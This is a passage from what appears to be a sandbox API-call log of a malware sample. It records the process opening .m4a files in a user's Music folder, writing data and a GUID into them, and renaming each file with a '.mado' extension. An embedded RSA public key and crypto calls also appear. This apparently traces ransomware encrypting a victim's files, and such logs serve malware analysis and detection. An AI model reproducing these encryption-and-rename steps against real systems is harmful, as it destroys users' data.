(HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.418] GetCurrentThreadId () returned 0x600 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe250 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.420] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x77e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.420] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.420] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.420] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.420] CloseHandle (hObject=0x63c) returned 1 [0204.421] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FOZ GswnS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\foz gswns.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FOZ GswnS.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\foz gswns.m4a.mado")) returned 1 [0204.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.422] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.423] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4cc580, ftCreationTime.dwHighDateTime=0x1d5d9de, ftLastAccessTime.dwLowDateTime=0xa88accc0, ftLastAccessTime.dwHighDateTime=0x1d5e299, ftLastWriteTime.dwLowDateTime=0xa88accc0, ftLastWriteTime.dwHighDateTime=0x1d5e299, nFileSizeHigh=0x0, nFileSizeLow=0xe1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fQRNYm.m4a", cAlternateFileName="")) returned 1 [0204.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fQRNYm.m4a") returned=".m4a" [0204.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fQRNYm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fqrnym.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.423] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=57848) returned 1 [0204.424] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.426] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe1d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.426] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.427] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe1f8, lpOverlapped=0x0) returned 1 [0204.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.428] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.429] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.429] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.429] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.429] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.429] GetLastError () returned 0x0 [0204.429] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.429] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.429] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.429] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.430] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.430] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe298 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe280 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.431] GetCurrentThreadId () returned 0x600 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71900 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.431] GetCurrentThreadId () returned 0x600 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.433] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe1f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.433] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.434] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.434] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.434] CloseHandle (hObject=0x63c) returned 1 [0204.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.435] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fQRNYm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fqrnym.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fQRNYm.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fqrnym.m4a.mado")) returned 1 [0204.437] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c399950, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x7c1b7280, ftLastAccessTime.dwHighDateTime=0x1d5e793, ftLastWriteTime.dwLowDateTime=0x7c1b7280, ftLastWriteTime.dwHighDateTime=0x1d5e793, nFileSizeHigh=0x0, nFileSizeLow=0x188f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gX1KLciA.m4a", cAlternateFileName="")) returned 1 [0204.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.437] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gX1KLciA.m4a") returned=".m4a" [0204.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gX1KLciA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gx1klcia.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.438] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=100592) returned 1 [0204.438] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.440] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x188ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.440] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, 